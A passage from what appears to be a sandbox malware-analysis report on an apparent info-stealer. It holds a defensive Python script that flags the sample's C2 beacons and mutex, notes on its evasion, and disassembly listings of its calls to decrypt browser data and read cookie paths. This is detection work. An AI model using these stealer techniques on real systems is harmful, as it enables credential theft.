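    Win32 object names are case sensitive, so the GUID itself must match exactly.
    """
    return _NS_PREFIX.sub("", name) == MUTEX_NAME


def scan_mutex_events(events):
    """events: iterable of (process_name, mutex_name); returns the matching ones."""
    return [(proc, name) for proc, name in events if is_sample_mutex(name)]


# Constructed sample telemetry (not captured from a real host).
SAMPLE_PROXY_LOG = [
    '2024-08-20T10:00:01Z 10.0.0.5 GET www.example.com / 200 text/html "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"',
    f'2024-08-20T10:00:07Z 10.0.0.5 POST {C2_HOST} {C2_PATH} 200 {C2_CONTENT_TYPE} "{C2_USER_AGENT}"',
    f'2024-08-20T10:00:09Z 10.0.0.7 POST cdn.example.net /upload 200 {C2_CONTENT_TYPE} "{C2_USER_AGENT}"',
    f'2024-08-20T10:00:11Z 10.0.0.9 POST {C2_HOST} {C2_PATH} 404 {C2_CONTENT_TYPE} "curl/8.0"',
]
SAMPLE_MUTEX_EVENTS = [
    ("explorer.exe", "Local\\SM0:1234:168:WilStaging_02"),
    ("V6ZsDcgx4N.exe", "\\Sessions\\1\\BaseNamedObjects\\" + MUTEX_NAME),
]

if __name__ == "__main__":
    for score, reasons, line in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"[{score}] {line}\n      " + "; ".join(reasons))
    for proc, name in scan_mutex_events(SAMPLE_MUTEX_EVENTS):
        print(f"mutex hit: {proc} -> {name}")
```

Two caveats a practitioner should keep in mind. First, the beacon loop at 192e60 sleeps only 0x3E8 (1000 ms) between iterations, so a live infection produces a steady stream of identical POSTs rather than a single hit; alerting on the first match is enough. Second, the mutex routine at 00191D43 follows CreateMutexA with GetLastError, Sleep(0x1388, 5000 ms), CloseHandle and ExitProcess, which is consistent with the process exiting when the name already exists. That is why the report flags the chain as evasive (an analysis environment in which the name is already taken sees no beaconing), and it is also why pre-creating the same mutex on a host can be used to keep a second copy from running.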

    Control-flow Graph (rendered graph not preserved): function 193ef0-193f62; API in the graph: VirtualAlloc (three call sites, at 193ef0, 193f16 and 193f39).
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00193D5B,?,00191D86,?), ref: 00193EFE
    • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,00193D5B,?,00191D86,?), ref: 00193F21
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 11e146ce3b3fc8aba9176f74902bc98f31fc8b6cbcbbecd3ead5fb1d5e853737
    • Instruction ID: 8510be32cfd70a93fe9decb5c7b829cccde207cb057648e2be1f3e43ddb5c41c
    • Opcode Fuzzy Hash: 11e146ce3b3fc8aba9176f74902bc98f31fc8b6cbcbbecd3ead5fb1d5e853737
    • Instruction Fuzzy Hash: C1F0D070A8E318EEEB645B71BEDEB1535B45308B16F100426B716AD5D0E3B452C09A1A

    Control-flow Graph (rendered graph not preserved): function 192bd0-192da9; calls 1991d0, 192060 and 191ee0; API in the graph: ExitProcess (two call sites, at 192c94 and 192cbc).
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 64861559b6c049f639723116096c04e50082244f46ca104e0174082016f35af9
    • Instruction ID: f61aecbff6d7ff2d41ffa2a2d216a0dfcce773b62692a8a826696d899dc56a7d
    • Opcode Fuzzy Hash: 64861559b6c049f639723116096c04e50082244f46ca104e0174082016f35af9
    • Instruction Fuzzy Hash: 9151F274A00209EFDF18CF94D998BAEB7B1BF48304F208199E9056B291C775EE85DF91

    Control-flow Graph (rendered graph not preserved): function 198cc0-198cf5; calls 199260; API in the graph: GetPhysicallyInstalledSystemMemory.
    APIs
    • GetPhysicallyInstalledSystemMemory.KERNELBASE(00193265,00193265,00193147,?,?,?,?,?,?,?,?,?,00193147), ref: 00198CCA
    • __aulldiv.LIBCMT ref: 00198CE3
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: InstalledMemoryPhysicallySystem__aulldiv
    • String ID:
    • API String ID: 3833932492-0
    • Opcode ID: 4df88f184aa35fde41e30eed0d39220559dc2f7a53c7003a028c1c41d959b24c
    • Instruction ID: 88af7ab474bff0e88aefa0d72ceebf818fc3d6da14601d631ed60ad50751ae45
    • Opcode Fuzzy Hash: 4df88f184aa35fde41e30eed0d39220559dc2f7a53c7003a028c1c41d959b24c
    • Instruction Fuzzy Hash: C8E08C38604208B7CF00DFE0DC45B9A777CAB48700F0081A9B908A7280DF31AA01C7E5

    Control-flow Graph (rendered graph not preserved): function 198c70-198c96, a single basic block; APIs in the graph: KiUserCallbackDispatcher, GetSystemMetrics.
    APIs
    • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00198C75
    • GetSystemMetrics.USER32(00000001), ref: 00198C86
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CallbackDispatcherMetricsSystemUser
    • String ID:
    • API String ID: 365337688-0
    • Opcode ID: acc6e3f917002cb393e7bebcc8fa76269b1114e8605c2d05314830a60851bc33
    • Instruction ID: 353d141b17f8b9f6255c5ada491d7eff40bd7bd981b66796a2882a1aaa30915b
    • Opcode Fuzzy Hash: acc6e3f917002cb393e7bebcc8fa76269b1114e8605c2d05314830a60851bc33
    • Instruction Fuzzy Hash: 72D0C934144308EFD700DF91D809B94BBA8FF48751F54C176FD8D4A781DAB255858BE2

    Control-flow Graph (rendered graph not preserved): function 191110-1912e8; calls 192170, 192250, 1990f0, 1936d0 (two call sites), 1990b0 and 191ee0; API in the graph: DeleteFileW (at 1912c8).
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: DeleteFile
    • String ID:
    • API String ID: 4033686569-0
    • Opcode ID: 8ddea9995c81336d6a2b874a67162a43d234dd7530704bf9b3e8413c78ab841a
    • Instruction ID: f27c209b3b3ca0f2ab6ab9e72b3773a23395c1752621952007e6394637d71934
    • Opcode Fuzzy Hash: 8ddea9995c81336d6a2b874a67162a43d234dd7530704bf9b3e8413c78ab841a
    • Instruction Fuzzy Hash: 7251B674D08159BBCF04DFA4C890BEEBBB6AF95314F1881A8E8559B342C335EB91CB51

    Control-flow Graph (rendered graph not preserved): function 191060-191100; calls 198d40, 191ec0 and 192b10; API in the graph: SHGetFolderPathW.
    APIs
    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,-00000209), ref: 0019109E
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: FolderPath
    • String ID:
    • API String ID: 1514166925-0
    • Opcode ID: 1895b19786a9fb08cd6d77f4459d1eb3450abbd1ff4669e3148856eb82923426
    • Instruction ID: 6fee465d0f52d78735461c75e0789ef6abba060622802256b1a1157168b76c96
    • Opcode Fuzzy Hash: 1895b19786a9fb08cd6d77f4459d1eb3450abbd1ff4669e3148856eb82923426
    • Instruction Fuzzy Hash: F81142B5A04208BBDB00DF98C855FEE7775EF44314F14C168FA289B2C2D7769A41CB90

    Control-flow Graph (rendered graph not preserved): function 1912f0-191373; calls 198d40 and 193a20; API in the graph: SHGetFolderPathW.
    APIs
    • SHGetFolderPathW.SHELL32(00000000,10428910,00000000,00000000,00192520), ref: 00191321
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: FolderPath
    • String ID:
    • API String ID: 1514166925-0
    • Opcode ID: 720b6e9f2aadbcc30fd74682df808e317a8d51cf591768fc0630d0a4816bef73
    • Instruction ID: 62642c4141502e180fa5a752c5c79ed7638a72c610dbe5cec65941b6ff13506f
    • Opcode Fuzzy Hash: 720b6e9f2aadbcc30fd74682df808e317a8d51cf591768fc0630d0a4816bef73
    • Instruction Fuzzy Hash: 95015EB0600208BBDB04CF48CC55FEA7378EB44314F1482A8FA194B2C2D775AB84CB94

    Control-flow Graph (rendered graph not preserved): function 198b90-198bfd; calls 191f10 (two call sites); API in the graph: GetCurrentHwProfileA.
    APIs
    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00198BA0
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CurrentProfile
    • String ID:
    • API String ID: 2104809126-0
    • Opcode ID: 1c15b96e27df9424ba9b1e2e2f44ab5cd215c35183500fd084a808e51944decc
    • Instruction ID: 823dfbf6428028509bdc459738a6c812f428a0e78310050f453e7921cb9c14c4
    • Opcode Fuzzy Hash: 1c15b96e27df9424ba9b1e2e2f44ab5cd215c35183500fd084a808e51944decc
    • Instruction Fuzzy Hash: 90F0FFB090410CABCF04DB64D891BBE3B79EB41304F18C1A9F90656285EB31DB448B51
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: da79f7f49f10b24e42cee1365696f61a6de605d49261fddc7ac32c7ba1ef4680
    • Instruction ID: f73625c4d9bdde4a23211141e431d5b5b91a4abb60062fee6f9f401817a66bf2
    • Opcode Fuzzy Hash: da79f7f49f10b24e42cee1365696f61a6de605d49261fddc7ac32c7ba1ef4680
    • Instruction Fuzzy Hash: CDE0DFB6A04208FFDF009FA0E888BAB33A8AB44720F08C414F90E8B110C331D980CB91
    APIs
    • ExitProcess.KERNEL32 ref: 00191CD0
      • Part of subcall function 00191E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00191CB1,?,00191D86,?), ref: 00191E59
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CreateExitHeapProcess
    • String ID:
    • API String ID: 611137554-0
    • Opcode ID: f2745f8180ff4c3e8a2caa45e87a729228c3425341716613d1e5377fbe4fcccd
    • Instruction ID: ab53a9b36e1be4b3bb15079d64f794a8fdb5c3260b06117be71adeefc5762bf5
    • Opcode Fuzzy Hash: f2745f8180ff4c3e8a2caa45e87a729228c3425341716613d1e5377fbe4fcccd
    • Instruction Fuzzy Hash: 15D06765B8570776EE6037B25E0676A36CC5F22784F880821BE08C5696FB65ED9082A2
    APIs
    • RtlFreeHeap.NTDLL(02590000,00000000,00000000,009C0000), ref: 00191EFE
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 96807a4a7003ef08c04f1c74191c82191d844e8b991f2520271e7c67c1bab140
    • Instruction ID: 81387e2ecb43f9d187735a63daf8c0aa69fd7456bed5b1d32184c01f68e4169f
    • Opcode Fuzzy Hash: 96807a4a7003ef08c04f1c74191c82191d844e8b991f2520271e7c67c1bab140
    • Instruction Fuzzy Hash: B2E0177050920CFBDB14CF98EA88BAE7BF8EB08705F104199F90887790D771AE80CB91
    APIs
    • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00191CB1,?,00191D86,?), ref: 00191E59
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: fea00a7663e4d7b498f234a5014004a818db611b8c7240c319fa5fdcf8ae5e83
    • Instruction ID: c65f560b6f5dee84a4ac538ea6ddecf2a3f09f41b67b216d37fd85543fca74c5
    • Opcode Fuzzy Hash: fea00a7663e4d7b498f234a5014004a818db611b8c7240c319fa5fdcf8ae5e83
    • Instruction Fuzzy Hash: 09D01230668309FBF7205760BD89B153694A304B55F100432FD0A895F0E3B164C04614
    APIs
    • RtlAllocateHeap.NTDLL(02590000,00000008,00193D82), ref: 00191EB0
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: f4905e0ff291d6595c1ae9d04c43c2798dafa3bd2a95f8235b5af776cb240d87
    • Instruction ID: da345d6efd461fe1627a04968e25969d5a36c8c2d3841ed10ee773e776b4f34c
    • Opcode Fuzzy Hash: f4905e0ff291d6595c1ae9d04c43c2798dafa3bd2a95f8235b5af776cb240d87
    • Instruction Fuzzy Hash: B9C04C75164208ABD6049B94FE99E6A3BACA748A00F444519B6094A550DB61A8408750
    APIs
    • Sleep.KERNELBASE(000003E8), ref: 00192E41
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: 8235c94547f327b29930af424654b69cffd98ef84b1a1409b74bfc6391310cd8
    • Instruction ID: f0b27125cc05f05b784c288e552ad1a2a73cb2f124fb4f03a109f75100263ced
    • Opcode Fuzzy Hash: 8235c94547f327b29930af424654b69cffd98ef84b1a1409b74bfc6391310cd8
    • Instruction Fuzzy Hash: CA113678A00208F7CB18CF88D490AB9B7B5FF58305F608198F9068B381E735DE91E7A0
    APIs
    • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 00192AF6
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: a55bc0ca7da8e524c00091b054f3d898e6a02602733bdbf1d26a7a122f96e6ea
    • Instruction ID: 9a78a9f3b85993ea02f9118f38284c4e2b25b94170aa3588c14721dabf036fee
    • Opcode Fuzzy Hash: a55bc0ca7da8e524c00091b054f3d898e6a02602733bdbf1d26a7a122f96e6ea
    • Instruction Fuzzy Hash: 3C119E29900219F6CF24DF95D441BBC77B2BF14700F6040A9F9062BAC1E7B95F80E391
    APIs
    • NtQueryObject.NTDLL(00191593,00000001,?,00000000,00000000), ref: 0019166E
    • NtQueryObject.NTDLL(00191593,00000001,?,00000000,00000000), ref: 00191689
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: ObjectQuery
    • String ID: \Local Extensions Settings\$\Network\Cookies$p+v
    • API String ID: 2748340528-202866110
    • Opcode ID: 50c592662f3036eb374851aa07ebb2fa2805ede2717617f7b4ad5a651320eed7
    • Instruction ID: 1a08084465bac05f3331b88fac072363742a66977fbe82e770a061584c280d2b
    • Opcode Fuzzy Hash: 50c592662f3036eb374851aa07ebb2fa2805ede2717617f7b4ad5a651320eed7
    • Instruction Fuzzy Hash: D1216379E00208BBDF10CB90DD41FD97779AB58705F548099F948D7281EBB1EAD8CB91
    APIs
    • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,001916EB,?,00191CA8,?,00191D86,?), ref: 00191C53
    • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,001916EB,?,00191CA8,?,00191D86,?), ref: 00191C63
    • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,001916EB,?,00191CA8,?,00191D86,?), ref: 00191C6C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
    • String ID: `Iu
    • API String ID: 3068283267-3215586153
    • Opcode ID: 775aad5bbc8eca80822b0fc36427796b78e3d2fdf87cb1561f065e1774464a13
    • Instruction ID: 351ecb0cf9b73c5d30084531fc82c9a53ad0f58a1d5480fcadb98642abd4e052
    • Opcode Fuzzy Hash: 775aad5bbc8eca80822b0fc36427796b78e3d2fdf87cb1561f065e1774464a13
    • Instruction Fuzzy Hash: 8FC04C312D830566EA502BF46D0BB1936586B14B07F984015F30E984D19ED1545485A7
    APIs
    • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 00191033
      • Part of subcall function 001932A0: LocalFree.KERNEL32(?), ref: 001933BA
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID: CryptDataFreeLocalUnprotect
    • String ID:
    • API String ID: 1561624719-0
    • Opcode ID: cc56e62f8c78ec25d386d516eb41bffacf2178dfc6c36e8edc4255b9efcd7a7d
    • Instruction ID: d8bdf9aaaa2421de512c6d2e03aa591f4b7f0b06f77d3573cf14e61244caa063
    • Opcode Fuzzy Hash: cc56e62f8c78ec25d386d516eb41bffacf2178dfc6c36e8edc4255b9efcd7a7d
    • Instruction Fuzzy Hash: 73F01C7690010CAFDB04DFA8D885EFE77BCEB44310F08856AF9198B281EB31D694CB90
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
    • Instruction ID: 1787d30de3904c41c03c513e381a269e709bddba6d36213cde7ad63265d9666a
    • Opcode Fuzzy Hash: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
    • Instruction Fuzzy Hash: 26312CB1D00209EFDF14CF98D841BAEBBB4EF15314F24C46DEA4AE7241D734AA809B95
    Memory Dump Source
    • Source File: 00000000.00000002.2522747769.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
    • Associated: 00000000.00000002.2522726929.0000000000190000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522766252.000000000019A000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522782172.000000000019B000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2522797454.000000000019C000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_190000_V6ZsDcgx4N.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
    • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
    • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595